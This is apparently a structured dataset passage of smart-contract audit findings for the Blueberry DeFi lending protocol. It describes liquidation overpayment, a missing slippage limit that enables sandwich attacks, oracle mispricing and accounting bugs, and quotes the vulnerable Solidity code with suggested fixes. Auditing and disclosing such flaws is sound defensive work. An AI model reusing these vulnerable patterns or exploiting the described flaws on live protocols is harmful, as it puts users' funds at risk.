<\\n config.withdrawVaultFeeWindowStartTime() +\\n config.withdrawVaultFeeWindow()\\n ) {\\n uint256 fee = (withdrawAmount * config.withdrawVaultFee()) /\\n DENOMINATOR;\\n uToken.safeTransfer(config.treasury(), fee);\\n withdrawAmount -= fee;\\n }\\n uToken.safeTransfer(msg.sender, withdrawAmount);\\n\\n emit Withdrawn(msg.sender, withdrawAmount, shareAmount);\\n}\\n```\\n\\nNowhere in this process is `bank.totalLend` updated. As a result, each time there is a liquidation of size X, `bank.totalLend` will move X higher relative to the correct value. Slowly, over time, this value will begin to dramatically misrepresent the accurate amount that has been lent.\\nWhile there is no material exploit based on this inaccuracy at the moment, this is a core piece of data in the protocol, and it's inaccuracy could lead to major issues down the road.\\nFurthermore, it will impact immediate user behavior, as the Blueberry devs have explained \"we use that [value] to help us display TVL with subgraph\", which will deceive and confuse users.чIssue totalLend isn't updated on liquidation, leading to permanently inflated value\\nFor the best accuracy, updating `bank.totalLend` should happen from the `withdraw()` function in `SoftVault.sol` instead of from the core `BlueberryBank.sol` contract.\\nAlternatively, you could add an update to `bank.totalLend` in the `liquidate()` function, which might temporarily underrepresent the total lent before the liquidator withdrew the funds, but would end up being accurate over the long run.чA core metric of the protocol will be permanently inaccurate, giving users incorrect data to make their assessments on and potentially causing more severe issues down the road.ч```\\nbank.totalLend += amount;\\n```\\n -Complete debt size is not paid off for fee on transfer tokens, but users aren't warnedчmediumчThe protocol seems to be intentionally catering to fee on transfer tokens by measuring token balances before and after transfers to determine the value received. However, the mechanism to pay the full debt will not succeed in paying off the debt if it is used with a fee on transfer token.\\nThe protocol is clearly designed to ensure it is compatible with fee on transfer tokens. For example, all functions that receive tokens check the balance before and after, and calculate the difference between these values to measure tokens received:\\n```\\nfunction doERC20TransferIn(address token, uint256 amountCall)\\n internal\\n returns (uint256)\\n{\\n uint256 balanceBefore = IERC20Upgradeable(token).balanceOf(\\n address(this)\\n );\\n IERC20Upgradeable(token).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amountCall\\n );\\n uint256 balanceAfter = IERC20Upgradeable(token).balanceOf(\\n address(this)\\n );\\n return balanceAfter - balanceBefore;\\n}\\n```\\n\\nThere is another feature of the protocol, which is that when loans are being repaid, the protocol gives the option of passing `type(uint256).max` to pay your debt in full:\\n```\\nif (amountCall == type(uint256).max) {\\n amountCall = oldDebt;\\n}\\n```\\n\\nHowever, these two features are not compatible. If a user paying off fee on transfer tokens passes in `type(uint256).max` to pay their debt in full, the full amount of their debt will be calculated. But when that amount is transferred to the contract, the amount that the result increases will be slightly less. As a result, the user will retain some balance that is not paid off.чI understand that it would be difficult to implement a mechanism to pay fee on transfer tokens off in full. That adds a lot of complexity that is somewhat fragile.\\nThe issue here is that the failure is silent, so that users request to pay off their loan in full, get confirmation, and may not realize that the loan still has an outstanding balance with interest accruing.\\nTo solve this, there should be a confirmation that any user who passes `type(uint256).max` has paid off their debt in full. Otherwise, the function should revert, so that users paying fee on transfer tokens know that they cannot use the \"pay in full\" feature and must specify the correct amount to get their outstanding balance down to zero.чThe feature to allow loans to be paid in full will silently fail when used with fee on transfer tokens, which may trick users into thinking they have completely paid off their loans, and accidentally maintaining a balance.ч```\\nfunction doERC20TransferIn(address token, uint256 amountCall)\\n internal\\n returns (uint256)\\n{\\n uint256 balanceBefore = IERC20Upgradeable(token).balanceOf(\\n address(this)\\n );\\n IERC20Upgradeable(token).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amountCall\\n );\\n uint256 balanceAfter = IERC20Upgradeable(token).balanceOf(\\n address(this)\\n );\\n return balanceAfter - balanceBefore;\\n}\\n```\\n -HardVault never deposits assets to CompoundчmediumчWhile the protocol states that all underlying assets are deposited to their Compound fork to earn interest, it appears this action never happens in `HardVault.sol`.\\nThe documentation and comments seem to make clear that all assets deposited to `HardVault.sol` should be deposited to Compound to earn yield:\\n```\\n/**\\n * @notice Deposit underlying assets on Compound and issue share token\\n * @param amount Underlying token amount to deposit\\n * @return shareAmount cToken amount\\n */\\nfunction deposit(address token, uint256 amount) { // rest of code }\\n\\n/**\\n * @notice Withdraw underlying assets from Compound\\n * @param shareAmount Amount of cTokens to redeem\\n * @return withdrawAmount Amount of underlying assets withdrawn\\n */\\nfunction withdraw(address token, uint256 shareAmount) { // rest of code }\\n```\\n\\nHowever, if we examine the code in these functions, there is no movement of the assets to Compound. Instead, they sit in the Hard Vault and doesn't earn any yield.чEither add the functionality to the Hard Vault to have the assets pulled from the ERC1155 and deposited to the Compound fork, or change the comments and docs to be clear that such underlying assets will not be receiving any yield.чUsers who may expect to be earning yield on their underlying tokens will not be.ч```\\n/**\\n * @notice Deposit underlying assets on Compound and issue share token\\n * @param amount Underlying token amount to deposit\\n * @return shareAmount cToken amount\\n */\\nfunction deposit(address token, uint256 amount) { // rest of code }\\n\\n/**\\n * @notice Withdraw underlying assets from Compound\\n * @param shareAmount Amount of cTokens to redeem\\n * @return withdrawAmount Amount of underlying assets withdrawn\\n */\\nfunction withdraw(address token, uint256 shareAmount) { // rest of code }\\n```\\n -Withdrawals from IchiVaultSpell have no slippage protection so can be frontrun, stealing all user fundsчmediumчWhen a user withdraws their position through the `IchiVaultSpell`, part of the unwinding process is to trade one of the released tokens for the other, so the borrow can be returned. This trade is done on Uniswap V3. The parameters are set in such a way that there is no slippage protection, so any MEV bot could see this transaction, aggressively sandwich attack it, and steal the majority of the user's funds.\\nUsers who have used the `IchiVaultSpell` to take positions in Ichi will eventually choose to withdraw their funds. They can do this by calling `closePosition()` or `closePositionFarm()`, both of which call to `withdrawInternal()`, which follows loosely the following logic:\\nsends the LP tokens back to the Ichi vault for the two underlying tokens (one of which was what was borrowed)\\nswaps the non-borrowed token for the borrowed token on UniV3, to ensure we will be able to pay the loan back\\nwithdraw our underlying token from the Compound fork\\nrepay the borrow token loan to the Compound fork\\nvalidate that we are still under the maxLTV for our strategy\\nsend the funds (borrow token and underlying token) back to the user\\nThe issue exists in the swap, where Uniswap is called with the following function:\\n```\\nif (amountToSwap > 0) {\\n swapPool = IUniswapV3Pool(vault.pool());\\n swapPool.swap(\\n address(this),\\n !isTokenA,\\n int256(amountToSwap),\\n isTokenA\\n ? UniV3WrappedLibMockup.MAX_SQRT_RATIO - 1 \\n : UniV3WrappedLibMockup.MIN_SQRT_RATIO + 1, \\n abi.encode(address(this))\\n );\\n}\\n```\\n\\nThe 4th variable is called `sqrtPriceLimitX96` and it represents the square root of the lowest or highest price that you are willing to perform the trade at. In this case, we've hardcoded in that we are willing to take the worst possible rate (highest price in the event we are trading 1 => 0; lowest price in the event we are trading 0 => 1).\\nThe `IchiVaultSpell.sol#uniswapV3SwapCallback()` function doesn't enforce any additional checks. It simply sends whatever delta is requested directly to Uniswap.\\n```\\nfunction uniswapV3SwapCallback(\\n int256 amount0Delta,\\n int256 amount1Delta,\\n bytes calldata data\\n) external override {\\n if (msg.sender != address(swapPool)) revert NOT_FROM_UNIV3(msg.sender);\\n address payer = abi.decode(data, (address));\\n\\n if (amount0Delta > 0) {\\n if (payer == address(this)) {\\n IERC20Upgradeable(swapPool.token0()).safeTransfer(\\n msg.sender,\\n uint256(amount0Delta)\\n );\\n } else {\\n IERC20Upgradeable(swapPool.token0()).safeTransferFrom(\\n payer,\\n msg.sender,\\n uint256(amount0Delta)\\n );\\n }\\n } else if (amount1Delta > 0) {\\n if (payer == address(this)) {\\n IERC20Upgradeable(swapPool.token1()).safeTransfer(\\n msg.sender,\\n uint256(amount1Delta)\\n );\\n } else {\\n IERC20Upgradeable(swapPool.token1()).safeTransferFrom(\\n payer,\\n msg.sender,\\n uint256(amount1Delta)\\n );\\n }\\n }\\n}\\n```\\n\\nWhile it is true that there is an `amountRepay` parameter that is inputted by the user, it is not sufficient to protect users. Many users will want to make only a small repayment (or no repayment) while unwinding their position, and thus this variable will only act as slippage protection in the cases where users intend to repay all of their returned funds.\\nWith this knowledge, a malicious MEV bot could watch for these transactions in the mempool. When it sees such a transaction, it could perform a \"sandwich attack\", trading massively in the same direction as the trade in advance of it to push the price out of whack, and then trading back after us, so that they end up pocketing a profit at our expense.чHave the user input a slippage parameter to ensure that the amount of borrowed token they receive back from Uniswap is in line with what they expect.\\nAlternatively, use the existing oracle system to estimate a fair price and use that value in the `swap()` call.чUsers withdrawing their funds through the `IchiVaultSpell` who do not plan to repay all of the tokens returned from Uniswap could be sandwich attacked, losing their funds by receiving very little of their borrowed token back from the swap.ч```\\nif (amountToSwap > 0) {\\n swapPool = IUniswapV3Pool(vault.pool());\\n swapPool.swap(\\n address(this),\\n !isTokenA,\\n int256(amountToSwap),\\n isTokenA\\n ? UniV3WrappedLibMockup.MAX_SQRT_RATIO - 1 \\n : UniV3WrappedLibMockup.MIN_SQRT_RATIO + 1, \\n abi.encode(address(this))\\n );\\n}\\n```\\n -BasicSpell.doCutRewardsFee uses depositFee instead of withdraw feeчmediumчBasicSpell.doCutRewardsFee uses depositFee instead of withdraw fee\\n```\\n function doCutRewardsFee(address token) internal {\\n if (bank.config().treasury() == address(0)) revert NO_TREASURY_SET();\\n\\n\\n uint256 balance = IERC20Upgradeable(token).balanceOf(address(this));\\n if (balance > 0) {\\n uint256 fee = (balance * bank.config().depositFee()) / DENOMINATOR;\\n IERC20Upgradeable(token).safeTransfer(\\n bank.config().treasury(),\\n fee\\n );\\n\\n\\n balance -= fee;\\n IERC20Upgradeable(token).safeTransfer(bank.EXECUTOR(), balance);\\n }\\n }\\n```\\n\\nThis function is called in order to get fee from ICHI rewards, collected by farming. But currently it takes `bank.config().depositFee()` instead of `bank.config().withdrawFee()`.чIssue BasicSpell.doCutRewardsFee uses depositFee instead of withdraw fee\\nTake withdraw fee from rewards.чWrong fee amount is taken.ч```\\n function doCutRewardsFee(address token) internal {\\n if (bank.config().treasury() == address(0)) revert NO_TREASURY_SET();\\n\\n\\n uint256 balance = IERC20Upgradeable(token).balanceOf(address(this));\\n if (balance > 0) {\\n uint256 fee = (balance * bank.config().depositFee()) / DENOMINATOR;\\n IERC20Upgradeable(token).safeTransfer(\\n bank.config().treasury(),\\n fee\\n );\\n\\n\\n balance -= fee;\\n IERC20Upgradeable(token).safeTransfer(bank.EXECUTOR(), balance);\\n }\\n }\\n```\\n -ChainlinkAdapterOracle will return the wrong price for asset if underlying aggregator hits minAnswerчmediumчChainlink aggregators have a built in circuit breaker if the price of an asset goes outside of a predetermined price band. The result is that if an asset experiences a huge drop in value (i.e. LUNA crash) the price of the oracle will continue to return the minPrice instead of the actual price of the asset. This would allow user to continue borrowing with the asset but at the wrong price. This is exactly what happened to Venus on BSC when LUNA imploded.\\nChainlinkAdapterOracle uses the ChainlinkFeedRegistry to obtain the price of the requested tokens.\\n```\\nfunction latestRoundData(\\n address base,\\n address quote\\n)\\n external\\n view\\n override\\n checkPairAccess()\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n{\\n uint16 currentPhaseId = s_currentPhaseId[base][quote];\\n //@audit this pulls the Aggregator for the requested pair\\n AggregatorV2V3Interface aggregator = _getFeed(base, quote);\\n require(address(aggregator) != address(0), \"Feed not found\");\\n (\\n roundId,\\n answer,\\n startedAt,\\n updatedAt,\\n answeredInRound\\n ) = aggregator.latestRoundData();\\n return _addPhaseIds(roundId, answer, startedAt, updatedAt, answeredInRound, currentPhaseId);\\n}\\n```\\n\\nChainlinkFeedRegistry#latestRoundData pulls the associated aggregator and requests round data from it. ChainlinkAggregators have minPrice and maxPrice circuit breakers built into them. This means that if the price of the asset drops below the minPrice, the protocol will continue to value the token at minPrice instead of it's actual value. This will allow users to take out huge amounts of bad debt and bankrupt the protocol.\\nExample: TokenA has a minPrice of $1. The price of TokenA drops to $0.10. The aggregator still returns $1 allowing the user to borrow against TokenA as if it is $1 which is 10x it's actual value.\\nNote: Chainlink oracles are used a just one piece of the OracleAggregator system and it is assumed that using a combination of other oracles, a scenario like this can be avoided. However this is not the case because the other oracles also have their flaws that can still allow this to be exploited. As an example if the chainlink oracle is being used with a UniswapV3Oracle which uses a long TWAP then this will be exploitable when the TWAP is near the minPrice on the way down. In a scenario like that it wouldn't matter what the third oracle was because it would be bypassed with the two matching oracles prices. If secondary oracles like Band are used a malicious user could DDOS relayers to prevent update pricing. Once the price becomes stale the chainlink oracle would be the only oracle left and it's price would be used.чIssue ChainlinkAdapterOracle will return the wrong price for asset if underlying aggregator hits minAnswer\\nChainlinkAdapterOracle should check the returned answer against the minPrice/maxPrice and revert if the answer is outside of the bounds:\\n```\\n (, int256 answer, , uint256 updatedAt, ) = registry.latestRoundData(\\n token,\\n USD\\n );\\n \\n+ if (answer >= maxPrice or answer <= minPrice) revert();\\n```\\nчIn the event that an asset crashes (i.e. LUNA) the protocol can be manipulated to give out loans at an inflated priceч```\\nfunction latestRoundData(\\n address base,\\n address quote\\n)\\n external\\n view\\n override\\n checkPairAccess()\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n{\\n uint16 currentPhaseId = s_currentPhaseId[base][quote];\\n //@audit this pulls the Aggregator for the requested pair\\n AggregatorV2V3Interface aggregator = _getFeed(base, quote);\\n require(address(aggregator) != address(0), \"Feed not found\");\\n (\\n roundId,\\n answer,\\n startedAt,\\n updatedAt,\\n answeredInRound\\n ) = aggregator.latestRoundData();\\n return _addPhaseIds(roundId, answer, startedAt, updatedAt, answeredInRound, currentPhaseId);\\n}\\n```\\n -WIchiFarm will break after second deposit of LPчmediumчWIchiFarm.sol makes the incorrect assumption that IchiVaultLP doesn't reduce allowance when using the transferFrom if allowance is set to type(uint256).max. Looking at a currently deployed IchiVault this assumption is not true. On the second deposit for the LP token, the call will always revert at the safe approve call.\\nIchiVault\\n```\\n function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {\\n _transfer(sender, recipient, amount);\\n _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, \"ERC20: transfer amount exceeds allowance\"));\\n return true;\\n }\\n```\\n\\nThe above lines show the trasnferFrom call which reduces the allowance of the spender regardless of whether the spender is approved for type(uint256).max or not.\\n```\\n if (\\n IERC20Upgradeable(lpToken).allowance(\\n address(this),\\n address(ichiFarm)\\n ) != type(uint256).max\\n ) {\\n // We only need to do this once per pool, as LP token's allowance won't decrease if it's -1.\\n IERC20Upgradeable(lpToken).safeApprove(\\n address(ichiFarm),\\n type(uint256).max\\n );\\n }\\n```\\n\\nAs a result after the first deposit the allowance will be less than type(uint256).max. When there is a second deposit, the reduced allowance will trigger a safeApprove call.\\n```\\nfunction safeApprove(\\n IERC20Upgradeable token,\\n address spender,\\n uint256 value\\n) internal {\\n // safeApprove should only be called when setting an initial allowance,\\n // or when resetting it to zero. To increase and decrease it, use\\n // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'\\n require(\\n (value == 0) || (token.allowance(address(this), spender) == 0),\\n \"SafeERC20: approve from non-zero to non-zero allowance\"\\n );\\n _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value));\\n}\\n```\\n\\nsafeApprove requires that either the input is zero or the current allowance is zero. Since neither is true the call will revert. The result of this is that WIchiFarm is effectively broken after the first deposit.чOnly approve is current allowance isn't enough for call. Optionally add zero approval before the approve. Realistically it's impossible to use the entire type(uint256).max, but to cover edge cases you may want to add it.\\n```\\n if (\\n IERC20Upgradeable(lpToken).allowance(\\n address(this),\\n address(ichiFarm)\\n- ) != type(uint256).max\\n+ ) < amount\\n ) {\\n\\n+ IERC20Upgradeable(lpToken).safeApprove(\\n+ address(ichiFarm),\\n+ 0\\n );\\n // We only need to do this once per pool, as LP token's allowance won't decrease if it's -1.\\n IERC20Upgradeable(lpToken).safeApprove(\\n address(ichiFarm),\\n type(uint256).max\\n );\\n }\\n```\\nчWIchiFarm is broken and won't be able to process deposits after the first.ч```\\n function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {\\n _transfer(sender, recipient, amount);\\n _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, \"ERC20: transfer amount exceeds allowance\"));\\n return true;\\n }\\n```\\n -Liquidator can take all collateral and underlying tokens for a fraction of the correct priceчhighчWhen performing liquidation calculations, we use the proportion of the individual token's debt they pay off to calculate the proportion of the liquidated user's collateral and underlying tokens to send to them. In the event that the user has multiple types of debt, the liquidator will be dramatically overpaid.\\nWhen a position's risk rating falls below the underlying token's liquidation threshold, the position becomes liquidatable. At this point, anyone can call `liquidate()` and pay back a share of their debt, and receive a propotionate share of their underlying assets.\\nThis is calculated as follows:\\n```\\nuint256 oldShare = pos.debtShareOf[debtToken];\\n(uint256 amountPaid, uint256 share) = repayInternal(\\n positionId,\\n debtToken,\\n amountCall\\n);\\n\\nuint256 liqSize = (pos.collateralSize * share) / oldShare;\\nuint256 uTokenSize = (pos.underlyingAmount * share) / oldShare;\\nuint256 uVaultShare = (pos.underlyingVaultShare * share) / oldShare;\\n\\npos.collateralSize -= liqSize;\\npos.underlyingAmount -= uTokenSize;\\npos.underlyingVaultShare -= uVaultShare;\\n\\n// // rest of codetransfer liqSize wrapped LP Tokens and uVaultShare underlying vault shares to the liquidator\\n}\\n```\\n\\nTo summarize:\\nThe liquidator inputs a debtToken to pay off and an amount to pay\\nWe check the amount of debt shares the position has on that debtToken\\nWe call `repayInternal()`, which pays off the position and returns the amount paid and number of shares paid off\\nWe then calculate the proportion of collateral and underlying tokens to give the liquidator\\nWe adjust the liquidated position's balances, and send the funds to the liquidator\\nThe problem comes in the calculations. The amount paid to the liquidator is calculated as:\\n```\\nuint256 liqSize = (pos.collateralSize * share) / oldShare\\nuint256 uTokenSize = (pos.underlyingAmount * share) / oldShare;\\nuint256 uVaultShare = (pos.underlyingVaultShare * share) / oldShare;\\n```\\n\\nThese calculations are taking the total size of the collateral or underlying token. They are then multiplying it by `share / oldShare`. But `share / oldShare` is just the proportion of that one type of debt that was paid off, not of the user's entire debt pool.\\nLet's walk through a specific scenario of how this might be exploited:\\nUser deposits 1mm DAI (underlying) and uses it to borrow $950k of ETH and $50k worth of ICHI (11.8k ICHI)\\nBoth assets are deposited into the ETH-ICHI pool, yielding the same collateral token\\nBoth prices crash down by 25% so the position is now liquidatable (worth $750k)\\nA liquidator pays back the full ICHI position, and the calculations above yield `pos.collateralSize * 11.8k / 11.8k` (same calculation for the other two formulas)\\nThe result is that for 11.8k ICHI (worth $37.5k after the price crash), the liquidator got all the DAI (value $1mm) and LP tokens (value $750k)чIssue Liquidator can take all collateral and underlying tokens for a fraction of the correct price\\nAdjust these calculations to use `amountPaid / getDebtValue(positionId)`, which is accurately calculate the proportion of the total debt paid off.чIf a position with multiple borrows goes into liquidation, the liquidator can pay off the smallest token (guaranteed to be less than half the total value) to take the full position, stealing funds from innocent users.ч```\\nuint256 oldShare = pos.debtShareOf[debtToken];\\n(uint256 amountPaid, uint256 share) = repayInternal(\\n positionId,\\n debtToken,\\n amountCall\\n);\\n\\nuint256 liqSize = (pos.collateralSize * share) / oldShare;\\nuint256 uTokenSize = (pos.underlyingAmount * share) / oldShare;\\nuint256 uVaultShare = (pos.underlyingVaultShare * share) / oldShare;\\n\\npos.collateralSize -= liqSize;\\npos.underlyingAmount -= uTokenSize;\\npos.underlyingVaultShare -= uVaultShare;\\n\\n// // rest of codetransfer liqSize wrapped LP Tokens and uVaultShare underlying vault shares to the liquidator\\n}\\n```\\n -The maximum size of an `ICHI` vault spell position can be arbitrarily surpassedчmediumчThe maximum size of an `ICHI` vault spell position can be arbitrarily surpassed by subsequent deposits to a position due to a flaw in the `curPosSize` calculation.\\nIchi vault spell positions are subject to a maximum size limit to prevent large positions, ensuring a wide margin for liquidators and bad debt prevention for the protocol.\\nThe maximum position size is enforced in the `IchiVaultSpell.depositInternal` function and compared to the current position size `curPosSize`.\\nHowever, the `curPosSize` does not reflect the actual position size, but the amount of Ichi vault LP tokens that are currently held in the `IchiVaultSpell` contract (see L153).\\nAssets can be repeatedly deposited into an Ichi vault spell position using the `IchiVaultSpell.openPosition` function (via the `BlueBerryBank.execute` function).\\nOn the very first deposit, the `curPosSize` correctly reflects the position size. However, on subsequent deposits, the previously received Ichi `vault` LP tokens are kept in the `BlueBerryBank` contract. Thus, checking the balance of `vault` tokens in the `IchiVaultSpell` contract only accounts for the current deposit.\\nTest case\\nTo demonstrate this issue, please use the following test case:\\n```\\ndiff --git a/test/spell/ichivault.spell.test.ts b/test/spell/ichivault.spell.test.ts\\nindex 258d653..551a6eb 100644\\n--- a/test/spell/ichivault.spell.test.ts\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/test/spell/ichivault.spell.test.ts\\n@@ -163,6 // Add the line below\\n163,26 @@ describe('ICHI Angel Vaults Spell', () => {\\n afterTreasuryBalance.sub(beforeTreasuryBalance)\\n ).to.be.equal(depositAmount.mul(50).div(10000))\\n })\\n// Add the line below\\n it(\"should revert when exceeds max pos size due to increasing position\", async () => {\\n// Add the line below\\n await ichi.approve(bank.address, ethers.constants.MaxUint256);\\n// Add the line below\\n await bank.execute(\\n// Add the line below\\n 0,\\n// Add the line below\\n spell.address,\\n// Add the line below\\n iface.encodeFunctionData(\"openPosition\", [\\n// Add the line below\\n 0, ICHI, USDC, depositAmount.mul(4), borrowAmount.mul(6) // Borrow 1.800e6 USDC\\n// Add the line below\\n ])\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n await expect(\\n// Add the line below\\n bank.execute(\\n// Add the line below\\n 0,\\n// Add the line below\\n spell.address,\\n// Add the line below\\n iface.encodeFunctionData(\"openPosition\", [\\n// Add the line below\\n 0, ICHI, USDC, depositAmount.mul(1), borrowAmount.mul(2) // Borrow 300e6 USDC\\n// Add the line below\\n ])\\n// Add the line below\\n )\\n// Add the line below\\n ).to.be.revertedWith(\"EXCEED_MAX_POS_SIZE\"); // 1_800e6 // Add the line below\\n 300e6 = 2_100e6 > 2_000e6 strategy max position size limit\\n// Add the line below\\n })\\n it(\"should be able to return position risk ratio\", async () => {\\n let risk = await bank.getPositionRisk(1);\\n console.log('Prev Position Risk', utils.formatUnits(risk, 2), '%');\\n```\\n\\nRun the test with the following command:\\n```\\nyarn hardhat test --grep \"should revert when exceeds max pos size due to increasing position\"\\n```\\n\\nThe test case fails and therefore shows that the maximum position size can be exceeded without reverting.чConsider determining the current position size using the `bank.getPositionValue()` function instead of using the current Ichi vault LP token balance.чThe maximum position size limit can be exceeded, leading to potential issues with liquidations and bad debt accumulation.ч```\\ndiff --git a/test/spell/ichivault.spell.test.ts b/test/spell/ichivault.spell.test.ts\\nindex 258d653..551a6eb 100644\\n--- a/test/spell/ichivault.spell.test.ts\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/test/spell/ichivault.spell.test.ts\\n@@ -163,6 // Add the line below\\n163,26 @@ describe('ICHI Angel Vaults Spell', () => {\\n afterTreasuryBalance.sub(beforeTreasuryBalance)\\n ).to.be.equal(depositAmount.mul(50).div(10000))\\n })\\n// Add the line below\\n it(\"should revert when exceeds max pos size due to increasing position\", async () => {\\n// Add the line below\\n await ichi.approve(bank.address, ethers.constants.MaxUint256);\\n// Add the line below\\n await bank.execute(\\n// Add the line below\\n 0,\\n// Add the line below\\n spell.address,\\n// Add the line below\\n iface.encodeFunctionData(\"openPosition\", [\\n// Add the line below\\n 0, ICHI, USDC, depositAmount.mul(4), borrowAmount.mul(6) // Borrow 1.800e6 USDC\\n// Add the line below\\n ])\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n await expect(\\n// Add the line below\\n bank.execute(\\n// Add the line below\\n 0,\\n// Add the line below\\n spell.address,\\n// Add the line below\\n iface.encodeFunctionData(\"openPosition\", [\\n// Add the line below\\n 0, ICHI, USDC, depositAmount.mul(1), borrowAmount.mul(2) // Borrow 300e6 USDC\\n// Add the line below\\n ])\\n// Add the line below\\n )\\n// Add the line below\\n ).to.be.revertedWith(\"EXCEED_MAX_POS_SIZE\"); // 1_800e6 // Add the line below\\n 300e6 = 2_100e6 > 2_000e6 strategy max position size limit\\n// Add the line below\\n })\\n it(\"should be able to return position risk ratio\", async () => {\\n let risk = await bank.getPositionRisk(1);\\n console.log('Prev Position Risk', utils.formatUnits(risk, 2), '%');\\n```\\n -LP tokens cannot be valued because ICHI cannot be priced by oracle, causing all new open positions to revertчmediumчIn order to value ICHI LP tokens, the oracle uses the Fair LP Pricing technique, which uses the prices of both individual tokens, along with the quantities, to calculate the LP token value. However, this process requires the underlying token prices to be accessible by the oracle. Both Chainlink and Band do not support the ICHI token, so the function will fail, causing all new positions using the IchiVaultSpell to revert.\\nWhen a new Ichi position is opened, the ICHI LP tokens are posted as collateral. Their value is assessed using the `IchiLpOracle#getPrice()` function:\\n```\\nfunction getPrice(address token) external view override returns (uint256) {\\n IICHIVault vault = IICHIVault(token);\\n uint256 totalSupply = vault.totalSupply();\\n if (totalSupply == 0) return 0;\\n\\n address token0 = vault.token0();\\n address token1 = vault.token1();\\n\\n (uint256 r0, uint256 r1) = vault.getTotalAmounts();\\n uint256 px0 = base.getPrice(address(token0));\\n uint256 px1 = base.getPrice(address(token1));\\n uint256 t0Decimal = IERC20Metadata(token0).decimals();\\n uint256 t1Decimal = IERC20Metadata(token1).decimals();\\n\\n uint256 totalReserve = (r0 * px0) /\\n 10**t0Decimal +\\n (r1 * px1) /\\n 10**t1Decimal;\\n\\n return (totalReserve * 1e18) / totalSupply;\\n}\\n```\\n\\nThis function uses the \"Fair LP Pricing\" formula, made famous by Alpha Homora. To simplify, this uses an oracle to get the prices of both underlying tokens, and then calculates the LP price based on these values and the reserves.\\nHowever, this process requires that we have a functioning oracle for the underlying tokens. However, Chainlink and Band both do not support the ICHI token (see the links for their comprehensive lists of data feeds). As a result, the call to `base.getPrice(token0)` will fail.\\nAll prices are calculated in the `isLiquidatable()` check at the end of the `execute()` function. As a result, any attempt to open a new ICHI position and post the LP tokens as collateral (which happens in both `openPosition()` and openPositionFarm()) will revert.чThere will need to be an alternate form of oracle that can price the ICHI token. The best way to accomplish this is likely to use a TWAP of the price on an AMM.чAll new positions opened using the `IchiVaultSpell` will revert when they attempt to look up the LP token price, rendering the protocol useless.\\nThis vulnerability would result in a material loss of funds and the cost of the attack is low (relative to the amount of funds lost). The attack path is possible with reasonable assumptions that mimic on-chain conditions. The vulnerability must be something that is not considered an acceptable risk by a reasonable protocol team.\\nsherlock-admin\\nEscalate for 31 USDC\\nImpact stated is medium, since positions cannot be opened and no funds are at risk. The high severity definition as stated per Sherlock docs:\\nThis vulnerability would result in a material loss of funds and the cost of the attack is low (relative to the amount of funds lost). The attack path is possible with reasonable assumptions that mimic on-chain conditions. The vulnerability must be something that is not considered an acceptable risk by a reasonable protocol team.\\nYou've created a valid escalation for 31 USDC!\\nTo remove the escalation from consideration: Delete your comment. To change the amount you've staked on this escalation: Edit your comment (do not create a new comment).\\nYou may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.\\nhrishibhat\\nEscalation accepted\\nThis is a valid medium Also Given that this is an issue only for the Ichi tokens and impact is only unable to open positions.\\nsherlock-admin\\nEscalation accepted\\nThis is a valid medium Also Given that this is an issue only for the Ichi tokens and impact is only unable to open positions.\\nThis issue's escalations have been accepted!\\nContestants' payouts and scores will be updated according to the changes made on this issue.ч```\\nfunction getPrice(address token) external view override returns (uint256) {\\n IICHIVault vault = IICHIVault(token);\\n uint256 totalSupply = vault.totalSupply();\\n if (totalSupply == 0) return 0;\\n\\n address token0 = vault.token0();\\n address token1 = vault.token1();\\n\\n (uint256 r0, uint256 r1) = vault.getTotalAmounts();\\n uint256 px0 = base.getPrice(address(token0));\\n uint256 px1 = base.getPrice(address(token1));\\n uint256 t0Decimal = IERC20Metadata(token0).decimals();\\n uint256 t1Decimal = IERC20Metadata(token1).decimals();\\n\\n uint256 totalReserve = (r0 * px0) /\\n 10**t0Decimal +\\n (r1 * px1) /\\n 10**t1Decimal;\\n\\n return (totalReserve * 1e18) / totalSupply;\\n}\\n```\\n -onlyEOAEx modifier that ensures call is from EOA might not hold true in the futureчmediumчmodifier `onlyEOAEx` is used to ensure calls are only made from EOA. However, EIP 3074 suggests that using `onlyEOAEx` modifier to ensure calls are only from EOA might not hold true.\\nFor `onlyEOAEx`, `tx.origin` is used to ensure that the caller is from an EOA and not a smart contract.\\n```\\n modifier onlyEOAEx() {\\n if (!allowContractCalls && !whitelistedContracts[msg.sender]) {\\n if (msg.sender != tx.origin) revert NOT_EOA(msg.sender);\\n }\\n _;\\n }\\n```\\n\\nHowever, according to EIP 3074,\\nThis EIP introduces two EVM instructions AUTH and AUTHCALL. The first sets a context variable authorized based on an ECDSA signature. The second sends a call as the authorized account. This essentially delegates control of the externally owned account (EOA) to a smart contract.\\nTherefore, using tx.origin to ensure msg.sender is an EOA will not hold true in the event EIP 3074 goes through.ч```\\n modifier onlyEOAEx() {\\n if (!allowContractCalls && !whitelistedContracts[msg.sender]) {\\n if (isContract(msg.sender)) revert NOT_EOA(msg.sender);\\n }\\n _;\\n }\\n```\\nчUsing modifier `onlyEOAEx` to ensure calls are made only from EOA will not hold true in the event EIP 3074 goes through.ч```\\n modifier onlyEOAEx() {\\n if (!allowContractCalls && !whitelistedContracts[msg.sender]) {\\n if (msg.sender != tx.origin) revert NOT_EOA(msg.sender);\\n }\\n _;\\n }\\n```\\n -Incorrect shares accounting cause liquidations to fail in some casesчhighчAccounting mismatch when marking claimable yield against the vault's shares may cause failing liquidations.\\n`withdraw_underlying_to_claim()` distributes `_amount_shares` worth of underlying tokens (WETH) to token holders. Note that this burns the shares held by the vault, but for accounting purposes, the `total_shares` variable isn't updated.\\nHowever, if a token holder chooses to liquidate his shares, his `shares_owned` are used entirely in both 